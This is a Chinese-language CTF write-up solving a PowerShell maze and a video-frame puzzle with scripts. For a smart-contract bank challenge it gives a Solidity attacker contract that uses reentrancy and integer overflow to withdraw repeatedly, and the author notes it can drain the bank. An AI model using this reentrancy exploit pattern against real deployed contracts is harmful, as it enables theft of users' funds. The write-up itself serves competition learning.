Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Akiz

PowerShell 迷宫

官方题解实在是太慢啦!竟然要将近4分钟才能得到结果什么的(

下面这个方法只要数十秒就可以找到啦w

function recursive($path, $max)
{
    foreach ($item in @(Get-ChildItem $path))
    {
        $x = $item.X
    	$y = $item.Y
        $flag = $item.Flag
        if ($flag -ne $null) { 
            Write-Host ""
            Write-Host "$flag"
            $end = Get-Date
            Write-Host ('Total Runtime: ' + ($end - $start).TotalSeconds)
            exit 
        }
    	if ($x -eq $max) { return }
    	if ($y -eq $max) { return }
    	if ($array[$x, $y] -ne 1) { 
            $array[$x, $y] = 1 
            Write-Host -NoNewline "."
        	recursive $item.PSPath $max 
        }
    }
}

$start = Get-Date
$array=New-Object 'int[,]' 70, 70
recursive (Resolve-Path Down).ProviderPath 70

输出(比隔壁官方writeup快多了www)

............................
flag{...
Total Runtime: 12.7551591

三教奇妙夜

用cv2分析视频,选取特定点为黑色的所有帧相加,肉眼/Tesseract识别一下即可。

import cv2

def main():

    videoCapture = cv2.VideoCapture()
    videoCapture.open('output.mp4')
    frames = videoCapture.get(cv2.CAP_PROP_FRAME_COUNT)
    final = numpy.ndarray(shape=(240, 320, 3))
    
    for i in range(int(frames)):
        ret, frame = videoCapture.read()
        e = frame[200,300,0]
        if i % 10000 == 0:
            print(i)
        if e == 0:
            print(e)
            cv2.imwrite("Frame.(%d).jpg" % i, frame)
            final += frame
            cv2.imwrite("final.jpg", final)

main()

韭菜银行

flag1

直接打开合约地址即可知道secret,再调用一下get_flag_1即可。

flag2

死活找不到flag2所需要的user_id到底在哪里23333,最后的最后才看到公告“不要忽略打开/下载题目按钮”...

重入攻击+整数溢出即可。(甚至还能把合约里的keth提空

pragma solidity ^0.4.26;

contract JCBank {
    mapping (address => uint) public balance;
    mapping (uint => bool) public got_flag;
    uint128 secret;
    function deposit() public payable;
    function withdraw(uint amount) public;
    function get_flag_1(uint128 guess) public view returns(string);
    function get_flag_2(uint user_id) public;
}

contract Attacker {
    
    JCBank target;
    address self;
    uint price;
    address owner = 0xE575c9abD35Fa94F1949f7d559056bB66FddEB51;

    constructor () public payable{ target = JCBank(owner);  price = address(this).balance; self = msg.sender; }
    function deposit() public payable { target.deposit.value(price)(); }
    function withdraw() public payable { target.withdraw(price); target.withdraw(price); }
    function finally() public payable { self.transfer(address(this).balance); selfdestruct(msg.sender); }
    function flag(uint userid) public { target.get_flag_2(userid); }
    function () public payable { 
        if (msg.sender != owner) { return; } else { 
            if (price < address(owner).balance) { target.withdraw(price); 
            } else { target.withdraw(address(owner).balance);  return; }
        } 
    }
}

L513SMUbaOg8uxf.png